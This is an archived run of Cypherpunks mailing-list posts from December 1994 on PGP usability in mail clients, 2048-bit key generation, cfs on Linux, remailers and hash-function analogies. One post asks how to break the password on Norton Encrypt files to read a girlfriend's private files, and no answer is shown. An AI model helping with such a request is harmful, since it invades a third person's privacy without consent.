Notice the current time? It is before the 2048-bit key date. Look in
the code to find the date!

Happy Holidays!

-derek

From tedwards at src.umd.edu Wed Dec 21 11:54:59 1994
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Wed, 21 Dec 94 11:54:59 PST
Subject: GUI: PGP vs novices
In-Reply-To: <199412211837.KAA09590@homer.spry.com>
Message-ID:

On Wed, 21 Dec 1994 bshantz at spry.com wrote:

> It is my own personal opinion that in order for crypto to truly become
> mainframe, the software manufacturers of internet connectivity packages must
> integrate crypto into the applications. Look at the past threads here on
> Cypherpunks..."How do I write a script to put PGP into ELM?" "PGP DLL
> modularity" etc.

That's true to some extent. I'd love to be able to have every message I
want signed and encrypted from PINE automagically.
I could implement this by requiring keystrokes at the editor level. But that isn't the entire issue... On the issue of signing, there is another question. Do I really want to sign every message? I don't like signing my written name anywhere I don't have to. And whenever I do, I am careful to look at all the potential consequences. Signatures imply I am agreeing to some kind of contract. Perhaps I prefer my email unsigned, to give me a level of disputability. If my email was a business contract, then I'd be enthusiastic about signing it. But for a post to a political newsgroup, for instance, perhaps I don't want to make sure everybody can cryptographically assure themselves it comes from me. This leaves me open to potential forgery, but email forgery is well known and understood. Finally is physical security of keys. If I am going to sign anything, I want that key to be under control of only me. It is difficult for someone like me who uses workstations to keep a key only on floppy, especially as I find myself on different workstations, many diskless, all the time. -Thomas From bshantz at spry.com Wed Dec 21 11:55:31 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 21 Dec 94 11:55:31 PST Subject: GUI: PGP vs novices Message-ID: <199412211955.LAA11235@homer.spry.com> Jeff Licquia writes: >>You will notice that this message is not signed. That's because in order to >>sign it, I would need to save my message, hop out to a DOS box, PGP encrypt >>it, hop back to my mail program and insert the encrypted mail as a text file. >>That's enough to discourage the average user. This is pretty much what Tim >>May was talking about when he discussed why he doesn't sign his messages. >>It's not that he couldn't... it's just not practical for him. It's not really >>practical for me either, but I do it when I feel it's necessary. >Just a small nit, but it appears that you're running something >Windows-compatible on your desk (the DOS box and all that). 
>Are you aware
>of the good Windows tools for PGP? The particular one I use (PGPClip by
>Mike Meyer) uses the clipboard, and is very nice and simple.

Exactly my point Jeff. Thank you for justifying what I said....**WINK**,
**GRIN**.
In order to even use PGPClip, it involves something OUTSIDE the mail
application. (Although, it does sound intriguing to me.) Anyway, this is yet
another example of the user needing to be fully conscious that they are
signing or encrypting. It should be second nature. In order for it to become
second nature, it MUST be included in the design of the mail package. (Or News
reader, or FTP software, whatever.)

Third party utilities make a piece of software harder to use. That's a given.
Now, don't get me wrong, there are some nice third party vendor products out
there. But, I have yet to see a crypto product that merges (cross platform)
into a mail package smoothly.

>Not a flame, or even a spark. Just wanting to make life easier for crypto
>enthusiasts.

Didn't see any sparks at all, Jeff. I am interested in PGPClip (at least to
look at) does anyone have an FTP site pointer where I could find it?

-- Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                        bshantz at spry.com
Senior Software Engineer           SPRY Inc.
Direct #: (206)-442-8251           316 Occidental Ave. S.
Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From bshantz at spry.com Wed Dec 21 12:13:26 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 21 Dec 94 12:13:26 PST Subject: GUI: PGP vs novices Message-ID: <199412212013.MAA11597@homer.spry.com> Thomas Grant Edwards writes: >On the issue of signing, there is another question. Do I really want >to sign every message? I don't like signing my written name anywhere I >don't have to. And whenever I do, I am careful to look at all the >potential consequences. Signatures imply I am agreeing to some kind of >contract. Perhaps I prefer my email unsigned, to give me a level of >disputability. If my email was a business contract, then I'd be >enthusiastic about signing it. But for a post to a political newsgroup, >for instance, perhaps I don't want to make sure everybody can >cryptographically assure themselves it comes from me. This leaves me >open to potential forgery, but email forgery is well known and understood. Good point. However, the digital signature issue is still outside of what my topic was. I agree with you wholeheartedly. That's one of the reasons I don't sign everything. That particular "argument" about digisigs has been pounded into the ground by the Cypherpunks for the last year and probably longer. I just think (boy I feel repetitive) that there should be something inside the software so the user has the option to sign, or sign on the fly. If I type up a message and think, "hey, I really want people to know this is from me", It would be really cool to just hit a button on the toolbar, or grab a menu option to sign automatically before sending. 
You don't have to sign everything. But, you don't have to go out to another application (of any sort) in order to sign. It's right there in front of you. That was my point. >Finally is physical security of keys. If I am going to sign anything, I >want that key to be under control of only me. On a personal machine, say at home, that's not really a problem. On a computer at the office where everything is password protected, isn't really a problem either. Since the situations I work with deal mainly with the home user, key management isn't as much a worry as if you're using workstations. >It is difficult for someone like me who uses workstations to keep a key >only on floppy, especially as I find myself on different workstations, >many diskless, all the time. This issue has also been pounded into the ground. Carrying a disk around with you is really the only way to guarantee security. (Or memorizing your private key and typing it in every time. EEEEERRRGGHHHH) But, you are right. It is a pain in the ass. -- Brad From sameer at c2.org Wed Dec 21 12:17:24 1994 From: sameer at c2.org (sameer) Date: Wed, 21 Dec 94 12:17:24 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412210807.AAA05754@gwarn.versant.com> Message-ID: <199412212013.MAA14015@infinity.c2.org> > > I've thought about porting Matt Blaze's "cfs" to linux. cfs already runs on linux, s'far as I can tell. I was using it on linux about a year ago or so.. -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From jalicqui at prairienet.org Wed Dec 21 12:45:09 1994 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 21 Dec 94 12:45:09 PST Subject: GUI: PGP vs novices Message-ID: <9412212044.AA11437@firefly.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- >Jeff Licquia writes: And yes, you're forgiven for posting private E-mail. 
:-) Again, not a flame, just a warning to be more careful. I really didn't
mind in this case; however, you might be likely to find someone who would
be in others.

>>Just a small nit, but it appears that you're running something
>>Windows-compatible on your desk (the DOS box and all that). Are you aware
>>of the good Windows tools for PGP? The particular one I use (PGPClip by
>>Mike Meyer) uses the clipboard, and is very nice and simple.
>
>Exactly my point Jeff. Thank you for justifying what I said....**WINK**,
>**GRIN**.
>In order to even use PGPClip, it involves something OUTSIDE the mail
>application. (Although, it does sound intriguing to me.) Anyway, this is yet
>another example of the user needing to be fully conscious that they are
>signing or encrypting. It should be second nature. In order for it to become
>second nature, it MUST be included in the design of the mail package. (Or News
>reader, or FTP software, whatever.)
>
>Third party utilities make a piece of software harder to use. That's a given.

Granted. However, I'm unfortunately not a developer for a mail package,
which means I can only offer you a stopgap.

However, since writing you, I did remember another resource. There's a
commercial mailer called ZMail which is being talked about in
alt.security.pgp. It's supposedly extensible, and Guy Berliner has written
scripts for it which put an "Encrypt" and "Decrypt" button on his mailer's
toolbar.

Noticing you're from Spry, however, I may be encouraging you to use a
competitor's package. Perhaps you could wield some influence to get the
Internet-in-a-Box developers to integrate PGP into their mailer?

>>Not a flame, or even a spark. Just wanting to make life easier for crypto
>>enthusiasts.
>
>Didn't see any sparks at all, Jeff. I am interested in PGPClip (at least to
>look at) does anyone have an FTP site pointer where I could find it?

Unfortunately, no. I got it directly from Mike Meyer. I can send you a copy
via mail if you're interested.
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLviTRLnwkw8DU+OFAQGoKAP/ZgNQnrPumarAbM8YJ3bsbnByaMmnjoUw 8UD6xsmZQ1ldnq5acjECEyfpIOKNY9cpwQR/SWunDbdiiTaiuNaCwMgDTeodsuNh YhBxFdCJ1mgXVsPevrmB9Q2SjZ/VXW/Zc43qlnzrsZSS+Xya7Xu+vQkTwLD5jyHb aLrowvU86OM= =d+cZ -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Wed Dec 21 13:16:05 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Wed, 21 Dec 94 13:16:05 PST Subject: Kiwi cypherpunks In-Reply-To: <94122208374730@nzdairy.co.nz> Message-ID: <9412212113.AA27399@marlin.ssnet.com> The wise _DNA_ is known to have said... > > Lads (and lasses), > I seem to be having a bit of troub communicating > we the kiwis on this list directly, but no probs if I send to the > list. Has there been and communication on this topic in the last > 3 or so days??? We cant organise anything if we cant talk to each > other! Now who says the Aussie intelligence services aren't any good? :-) -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. From cort at ecn.purdue.edu Wed Dec 21 13:38:01 1994 From: cort at ecn.purdue.edu (cort) Date: Wed, 21 Dec 94 13:38:01 PST Subject: procmail Message-ID: <199412212137.QAA21402@en.ecn.purdue.edu> I just installed procmail (on my Linux system at work). The installation (readme, makefile, hand-holding along the way) was _very_ nice. It earns my hearty endorsement. Please advertise crypto enhancements to procmail to me (in email if not of general list interest). Who has the procmail integrated PGP (signing, etc.)? Cort. From jcorgan at netcom.com Wed Dec 21 13:38:08 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 21 Dec 94 13:38:08 PST Subject: Have 2.6.2 but cant gen 2048 bits Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Following is the output from pgp2.6.2 and me trying to generate >2048 bit keys. What am i doing rong? 
You'll probably get multiple answers for this. The code in PGP that allows you to enter 2048 bit keys isn't enabled until 12/25/94, so you need to set your clock ahead to try this (and don't forget to set it back--I spent three days sending people "Christmas" mail :) Also, though I'm not sure why, it seems that the generated keys are only 2047 bits in length. This was my experience, and has been reported in alt.security.pgp by a number of others as well. Expect about a 15-20 minute key generation time on a 486/66 PC. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvifok1Diok8GKihAQG7ggP/SNuz/n0njIuB2NQ7iIqPH3IWQ4dzOoP0 AlBTiq80CZjVAhTR80d8ckID36cKLRjRKq3kafKqzWoDfevL8UwxXbORIs0kyo6h qnQAg98qOOQMkSh8yxYHOfYL612VMKDMuBlXDSC4dNnItkmCwex780TnZRuq9Hc/ SmkiusdPEFQ= =GFPO -----END PGP SIGNATURE----- From jcorgan at netcom.com Wed Dec 21 14:05:06 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 21 Dec 94 14:05:06 PST Subject: GUI: PGP vs novices Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >I just think (boy I feel repetitive) that there should be something inside the >software so the user has the option to sign, or sign on the fly. If I type up >a message and think, "hey, I really want people to know this is from me", It >would be really cool to just hit a button on the toolbar, or grab a menu >option to sign automatically before sending. You don't have to sign >everything. But, you don't have to go out to another application (of any >sort) in order to sign. It's right there in front of you. 
To add to this thread: I'm working on a Windows based product that, while not achieving the level of integration that you describe, does enable one to assign signature, remailing, and encryption options from within the email message itself. The product works at the Windows Sockets layer, intercepting mail as it is sent from the mail application to the SMTP host, and performing the above crypto related functions based on text placed at the top of the mail message. - From the user perspective, I plan to make the product look just like the (excellent) Unix based PGP front end, premail. So, while you're typing your mail, if you want to add a signature, just add the line Signature: to the top (where userid is something that identifies the secret key to use). Features will include automatic signing, encryption, or remailing based upon destination address of the outgoing email. Incoming mail will be handled similarly, though there are some security issues surrounding automated access to your secret keyring that I haven't thought through yet. A major complication that I've come up against is installation. Somehow I've got to provide a painless way of discovering the Winsock stack in use on a machine, and installing my WINSOCK.DLL so that it gets loaded instead of the real one (which my software then loads on its own and intercepts calls to.) This is really easy to do manually when one has knowledge of such things; it is a major pain in the ass to come up with a way of doing this that doesn't require the user to know anything about Windows Sockets or DLL's or path variables, etc. On the other hand, the pain of installation only occurs once. For actual use, adding control lines to the top of one's mail is pretty simple. Not as good as having, say, "Encrypt", "Sign", and "Remail" buttons or menu items, but it should do for now. 
I may or may not have something to show at the next Cpunks meeting--depends on how frustrated I get with dealing with Windows' programming paradigm :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLviluE1Diok8GKihAQEGfAP/TRvp2ulO5MZJplYhwoFl5hvOmvSj1nNg N25aNm4++xzdywZ7ffPhIW6v2euk27eZLJS3p+CLcZ2JWQglmqWube3lQfg9mYsB cTf+w5Jyg+lDwvXExJ+9Fqe1mZLSIS+f2jeuAi6nJ5nFyeyYWTiWBmXP0gK7YQhC 5mCFzczhP8Q= =A9RZ -----END PGP SIGNATURE----- From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 14:37:55 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 21 Dec 94 14:37:55 PST Subject: Kiwi cypherpunks Message-ID: <94122211341071@nzdairy.co.nz> storm at marlin.ssnet.com said on 22-dec-1994 >The wise _DNA_ is known to have said... >> >> Lads (and lasses), >> I seem to be having a bit of troub communicating >> we the kiwis on this list directly, but no probs if I send to the >> list. Has there been and communication on this topic in the last >> 3 or so days??? We cant organise anything if we cant talk to each >> other! > >Now who says the Aussie intelligence services aren't any good? :-) Um, using the words aussie & intelligence in the same sentence is a bit of an contridiction in terms! @:)> I just dosent happen! T From bass at fc.net Wed Dec 21 15:09:09 1994 From: bass at fc.net (Bass Wastelan) Date: Wed, 21 Dec 94 15:09:09 PST Subject: NYT Potpurri and Econo-cash Message-ID: <199412212314.SAA21911@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- ECO_do - --- [This message has been signed by an auto-signing service. 
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvi2uSoZzwIn1bdtAQHOiQGAmRUcHy1wI/BkqpRQYj+ocztm4Go6YBBw pKzj1nY6PhcWz1pGYHNvolPFhF4hcN1L =nxS9 -----END PGP SIGNATURE----- From dave at esi.COM.AU Wed Dec 21 15:38:11 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Wed, 21 Dec 94 15:38:11 PST Subject: GUI: PGP vs novices In-Reply-To: Message-ID: On Wed, 21 Dec 1994, Thomas Grant Edwards wrote: > PGP has made me more crypto aware, but at this point neither I nor most of > the crypto aware people I personally know feel there is a need to either > encrypt or sign messages on a regular basis. While this doesn't do great > things for supporting crypto, it is simply reality. DigiCash is a > different situation of course - it is needed, and as soon as possible. You'll think differently when you start seeing malicious forged messages in your name, on a weekly basis... Looks like I made an enemy or two. (The forgeries stopped as soon as I started signing my messages.) -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From nobody at c2.org Wed Dec 21 18:04:05 1994 From: nobody at c2.org (Anonymous User) Date: Wed, 21 Dec 94 18:04:05 PST Subject: Remailer list needed Message-ID: <199412220200.SAA01353@zero.c2.org> "L. McCarthy" wrote: > Anyway, the standard ways of accessing the latest list are: > finger remailer-list at kiwi.cs.berkeley.edu > http://www.cs.berkeley.edu/~raph/remailer-list.html > > I don't know of a way to get it automatically via mail. 
I think the address to get finger via email is mg5n+finger at andrew.cmu.edu

From ghio at c2.org Wed Dec 21 18:33:46 1994
From: ghio at c2.org (Matthew Ghio)
Date: Wed, 21 Dec 94 18:33:46 PST
Subject: NONE
Message-ID: <199412220229.SAA14803@infinity.c2.org>

nobody at rebma.rebma.mn.org wrote:

> Matthew Ghio,
> You've done a great job in the past and continue to do so, but for
> the past week some (all?) of your users have not been getting any mail.
> What happened? Post to cypherpunks, remailer-operators, alt.privacy
> or alt.anonymous.messages, alt.abuse.recovery (either one. You choose).
>
> Thanks.

Well, I finally got a chance to catch up on a lot of email that I hadn't had time to read recently.

I had to take myriad.pc.cc.cmu.edu down for awhile. It should be back up in a few weeks.

My alias-based remailers, alias at alpha.c2.org and mg5n+alias at andrew.cmu.edu are still up. c2.org has been having network connection problems lately and some messages may have been delayed, but to my knowledge nothing has been lost.

For those who have been asking, help files are available by sending mail to help at alpha.c2.org, mg5n+remailer-help at andrew.cmu.edu, and a list of remailers and mail to usenet gateways is available from mg5n+remailers at andrew.cmu.edu

From admin at alpha.c2.org Wed Dec 21 19:06:11 1994
From: admin at alpha.c2.org (admin at alpha.c2.org)
Date: Wed, 21 Dec 94 19:06:11 PST
Subject: alpha.c2.org software upgrade
Message-ID: <9412220301.AA20375@toad.com>

It is now possible to send outgoing mail via the alias remailer at alpha.c2.org. To send a message, create a message of the following format:

From: me at alpha.c2.org (My Nym)
Password: mypass
Subject: test
To: alt.test at demon.co.uk

This is my message.

Encrypt this with the public key for the remailer and send it to alias at alpha.c2.org. It will decrypt it and send your message (after verifying and removing the password line.)
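The "verifying and removing the password line" step from the announcement above, as an added example that is not part of the original post and not the remailer's own code. It assumes the PGP decryption has already happened, writes addresses with "@" where the archive shows " at ", and invents the function names, the salted PBKDF2 account store and the sample data for illustration.

```python
import hashlib
import hmac

# Header names taken from the template in the announcement.
ALLOWED = ("from", "password", "subject", "to")


class Rejected(Exception):
    """Submission refused; nothing is forwarded."""


def hash_password(password: str, salt: bytes) -> bytes:
    # Assumption of this example: the operator stores salted PBKDF2 hashes,
    # never the plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def parse_submission(plaintext: str):
    """Split the decrypted text into a strict header dict and the body."""
    text = plaintext.replace("\r\n", "\n").lstrip("\n")
    head, sep, body = text.partition("\n\n")
    if not sep:
        raise Rejected("no blank line between headers and body")
    if "\r" in head:
        raise Rejected("bare carriage return in headers")
    headers = {}
    for line in head.split("\n"):
        if line[:1] in (" ", "\t"):
            raise Rejected("folded header lines are not accepted")
        name, colon, value = line.partition(":")
        key = name.strip().lower()
        if not colon or key not in ALLOWED:
            raise Rejected(f"unexpected header line: {name!r}")
        if key in headers:
            # A second Password: line could otherwise survive the strip.
            raise Rejected(f"duplicate header: {key}")
        headers[key] = value.strip()
    missing = [k for k in ALLOWED if k not in headers]
    if missing:
        raise Rejected("missing header(s): " + ", ".join(missing))
    return headers, body


# Used for unknown aliases so the hash is computed either way.
DUMMY = (b"\x00" * 16, b"\x00" * 32)


def process_submission(plaintext: str, accounts: dict) -> str:
    """Verify the alias password and return the message to forward."""
    headers, body = parse_submission(plaintext)
    address = headers["from"].split(" ", 1)[0].lower()
    salt, stored = accounts.get(address, DUMMY)
    supplied = hash_password(headers["password"], salt)
    # Constant-time comparison; the same error for bad alias and bad password.
    if not (hmac.compare_digest(supplied, stored) and address in accounts):
        raise Rejected("bad alias or password")
    # Rebuild the headers from the parsed values: the Password line is
    # dropped by construction, not by searching the text for it.
    out = [
        f"From: {headers['from']}",
        f"Subject: {headers['subject']}",
        f"To: {headers['to']}",
        "",
        body,
    ]
    return "\n".join(out)


# Constructed sample data (not real accounts or messages).
_SALT = b"constructed-salt"
ACCOUNTS = {"me@alpha.c2.org": (_SALT, hash_password("mypass", _SALT))}
SAMPLE = (
    "From: me@alpha.c2.org (My Nym)\n"
    "Password: mypass\n"
    "Subject: test\n"
    "To: alt.test@demon.co.uk\n"
    "\n"
    "This is my message.\n"
)

if __name__ == "__main__":
    print(process_submission(SAMPLE, ACCOUNTS))
```

A line reading "Password: ..." inside the body is left alone, since everything after the first blank line is the sender's own text.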
From 0003701548 at mcimail.com Wed Dec 21 20:12:26 1994 From: 0003701548 at mcimail.com (Alan Pugh) Date: Wed, 21 Dec 94 20:12:26 PST Subject: 'brief' macro for invoking pgp Message-ID: <04941222013040/0003701548PJ2EM@MCIMAIL.COM> -----BEGIN PGP SIGNED MESSAGE----- hello all, does anyone out there have a macro for the editor _brief_ by borland (last time i checked) that will invoke pgp to sign a message in the buffer. i've been using _brief_ as my primary editor since they were owned by _underware_, (no joke), and would like to be able to sign messages by pressing a hot key. i've been trying to do this off and on for some time, but my programming skills are almost nonexistant. preferably it would be filename independant. that is, it would work on the current buffer. the package was written to be able to compile files while within it, so it should be possible. any help would be greatly appreciated. thanks, amp <0003701548 at mcimail.com> December 21, 1995 20:27 -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMNnfligP1O9KJoPBAQHtEgf/TV8OeTFBpKhufmbIJqBpoj2Gt6dTjtH/ o3z1ExLFSYols4YAOAJbquqnUariSNrnqV1Ap2IjtNFM08eEAeAOBykjlKfjXWBt ZudoDlRfVoKmGnGVpn4Njo6wrlolpU0rezFls+4Zdx2sA7cLkBuTUBMNN0yq3oBw Yws2rfpKW8SGoj6gyDtkGKisDQtHUotmHTiIPVYI9FbTPa2Fs0Q5RnvAidl0i47m dDuWmfoP3VpiyAbPH9PMnI19Ax3U+n5MFKK0B8zUWIonUdv4px4u7eRo3b0kNCKl qETMZtoNB1Um3o7oZUZvjLAlKEEBOEmDweT4OVyxNt5q9thOO53wKA== =YlLN -----END PGP SIGNATURE----- From GERSTEIN at SCSUD.CTSTATEU.EDU Wed Dec 21 21:30:44 1994 From: GERSTEIN at SCSUD.CTSTATEU.EDU (ADAM GERSTEIN, _THE_ MACGURU) Date: Wed, 21 Dec 94 21:30:44 PST Subject: Is it possible to break Norton Encrypt?? Message-ID: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Howdy fellow 'punks- A friend of mine thinks his girlfriend has been cheating on him, and thinks the proof may be in a few Norton Encrypt files. Is there anyway to get the password with a data/resource editor, or is he shit-out-of-luck and looking for a new girl-friend? 
Please reply via private mail, since I had to leave the list for my christmas break. Adam Gerstein -=- "Practice safe HEX - always use a keyboard condom" - anon PGP Key available bye finger or mail with the sub: PGPKEY +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ |(e)Mail me: | | Gerstein at scsu.ctstateu.edu | AGerstein at aol.com | | MacGeek at scsu.ctstateu.edu | MacGeek at eWorld.com | | an41389 at anon.penet.fi (for anonymity) | +-------------------------------------------------------+ EWWWWW! - Betsy -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBWAwUBLq/fYbXVc2UFUOWNAQHu4QIBAQzD1aOCh4DV3Dg4DSJPmNu+1xGDRxND 0PavaUaBFP7GGT6EneTBwVX1ddL1PFFKdeMf8qo9FgWfG0EOHuHJTkY= =6rlg -----END PGP SIGNATURE----- From nesta at nesta.pr.mcs.net Wed Dec 21 23:04:06 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 21 Dec 94 23:04:06 PST Subject: macros for Pine and PGP In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Message-ID: I finally have a safe system to recieve mail on where I am the admin so I am wondering if there is a way i can automate PGP signing and decrypting and crypting mail with PINE, now with PINE I can choose emacs as my alternate editor and jump into emacs, and then use perhaps a PGP interface for Emacs then. But the emacs macros would have to allow me to specify the save name, or keep it the same as the tmp file PINE assigns for outgoing compositions when I crypt them. Also since PINE is MIMI supporting, is their MIMI support for PGP stuff yet? I am sorry I am so behind on this shit, it's just that I only marginally bothered to keep up with the interface stuff for Unix machines since I never had a machine that I could safely work from to sign outgoing mail and posts. 
thanx **I've got the strap-on connections in Lesbos, and the KY trust in Sodom, I'm the only Man in Istanbul, I'm the only punk in Islam, I'm the only bar on Skid Row, I'm the only whore on the waterfront** _Cobble Stone Gardens_ William Seward Burroughs From phillip at mserve.kiwi.gen.nz Wed Dec 21 23:29:45 1994 From: phillip at mserve.kiwi.gen.nz (Phillip Hardy) Date: Wed, 21 Dec 94 23:29:45 PST Subject: Kiwi cypherpunks In-Reply-To: <94122208374730@nzdairy.co.nz> Message-ID: On Thu, 22 Dec 1994, DNA wrote: > Lads (and lasses), > I seem to be having a bit of troub communicating > we the kiwis on this list directly, but no probs if I send to the > list. Has there been and communication on this topic in the last > 3 or so days??? We cant organise anything if we cant talk to each > other! > > T > ask bryve to mark a local listserve on cybernet. so we can use that to talk togeather? Then you can use this system to bouce some email around. From phillip at mserve.kiwi.gen.nz Wed Dec 21 23:30:41 1994 From: phillip at mserve.kiwi.gen.nz (Phillip Hardy) Date: Wed, 21 Dec 94 23:30:41 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412212013.MAA14015@infinity.c2.org> Message-ID: On Wed, 21 Dec 1994, sameer wrote: > > > > I've thought about porting Matt Blaze's "cfs" to linux. > > cfs already runs on linux, s'far as I can tell. I was using it > on linux about a year ago or so.. > Anyone know where i can ftp it from? I am outside the USA ;-) Phill.. This is my 2.5c worth : phillip at cybernet.co.nz (Phillip W. Hardy) For my public key type finger phillip at kiwi.gen.nz for PGP Public Key. cybernet now with 9 cd-roms online. +64-9-376-6400 Visit for Linux needs. 
They say jump, you say how-high (Rage Against the Machine)

From an169306 at anon.penet.fi Wed Dec 21 23:47:49 1994
From: an169306 at anon.penet.fi (an169306 at anon.penet.fi)
Date: Wed, 21 Dec 94 23:47:49 PST
Subject: Making sure a program gets to the receiver intact
Message-ID: <9412220711.AA21268@anon.penet.fi>

How can I insure a program, once put on FTP sites stays untampered with?

I have done the following, but I still find holes:

1: PGP signed each file with a separate .sig file.

2: Made a MD5 list, using 2-3 separate programs (making sure they agree), PGP signing the list, and asking friends to sign the list, leaving separate .sigs in the directory.

3: Encrypting a copy of the MD5 list with a passphrase (if all keys are fragged, then in front of trusted witnesses, I can decrypt the key, show them that the MD5 list is authentic.)

4: PKZIPPING it using my AV key. (Yes, I am aware that this is a joke, but since I am a registered user, why not use it?)

(Side note, if one uses PKZIP, please register it. I have seen so many unregistered copies of this, that it makes my eyes water.)

The holes:

1: Someone hacking the keyservers, substituting a key for all the people who signed, and modifying the archive to show that.

2: Someone breaking into my apt, sticking a keyboard monitor on, getting my passphrase and key.

Most of this is theoretical, as it is hard to hack _all_ keyservers to nuke my PGP key, then hack AOL, compuserve, and other FTP sites to modify the binary, but I would like to make _sure_ this program gets into user's hands without getting modified. (Not for paranoia reasons, but just to see how well one can make a package resistant to tampering.)

Pardon the anonymous ID, as my reputation with my REAL user id is not so great. (No, I am not Lance, but not that better off due to tons of dumb mistakes with my regular ID on this list.)
-------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From mikepb at freke.lerctr.org Thu Dec 22 02:39:58 1994
From: mikepb at freke.lerctr.org (Michael P. Brininstool)
Date: Thu, 22 Dec 94 02:39:58 PST
Subject: Hash functions & Physical Analogies
Message-ID: <1994Dec22.103705.26972@freke.lerctr.org>

I seem to remember someone mentioning that a hash function, like the one used in signatures in PGP, would show a large change for a small change in the file, and a small change for a large change in the file.

I was digging through some of my old stuff last weekend with my kids and found my old Rubik's Cube. I set it aside until last night.

Here is the connection. It was late, but I decided to try and figure out some "move" sequences that would move small numbers of blocks on the Rubik's cube, without changing the location or orientation of the rest. In doing this, I (re)noticed that simple "move" sequences resulted in a large number of displacements (translation and/or rotation) of the blocks in the cube. And that very large sequences of "moves" had the opposite effect (if it was the correct sequence). This, in my sleep deprived state, brought hash functions to mind. It also brought several questions to mind.

First question:
I think I have seen references to topology in discussions of cryptography. I have never had a topography class, so I was wondering, is Rubik's cube a topology problem?

Second question:
If Rubik's cube is a topo prob, is it a good analogy for trying to describe hash functions to people?

Third question:
If there is an analogy, how do you convince the lay person that the hash is a one-way function?
By demonstrating that it maps many to one, and the Rubik's Cube maps one to one?

Fourth question:
To sign a post with PGP (from within vi, under trn) Do I include the header in the lines to be run through 'pgp -fast' or not? (I have the cp list go into a news gateway on my home machine so that threads are easier to follow)

---------------------------------------------------------------|
| #include "std/disclaimer.h" Michael P. Brininstool |
| mikepb at freke.lerctr.org OR mikepb at netcom.com |
| (408)251-3222(Home) (415)253-0853(Pager) (415)694-1882(Work) |
|---------------------------------------------------------------

From danisch at ira.uka.de Thu Dec 22 09:11:38 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Thu, 22 Dec 94 09:11:38 PST
Subject: Hash functions & Physical Analogies
Message-ID: <9412221710.AA17850@elysion.iaks.ira.uka.de>

Michael P. Brininstool wrote:

> I seem to remember someone mentioning that a hash function, like the
> one used in signatures in PGP, would show a large change for a small
> change in the file, and a small change for a large change in the file.

More important is that it is difficult (infeasible) to find a file for a given hash value. (This implies that small file changes result in large hash value changes.)

> First question:
> I think I have seen references to topology in discussions of
> cryptography. I have never had a topography class, so I was
> wondering, is Rubik's cube a topology problem?

No, it is a permutation group. Use the Schreier-Sims-Algorithm to find solutions.

> Second question:
> If Rubik's cube is a topo prob, is it a good analogy for trying
> to describe hash functions to people?

No. It is a simple thing to find a turn which fits to a given state of the cube. When the cube came out a German newspaper published a simple method for solving the cube. This means everyone can easily find a "message" which fits to a given "hash value". This must not be possible for a cryptographic hash function.
The hash-function must be a one-way function, but the cube isn't one-way.

Furthermore, the cube allows some kind of differential analysis. Since turning the front side only affects the front side, you can see what to do to turn the front side back. That's also not good for cryptographic context.

> Third question:
> If there is an analogy, how do you convince the lay person that the
> hash is a one-way function? By demonstrating that it maps many to
> one, and the Rubik's Cube maps one to one?

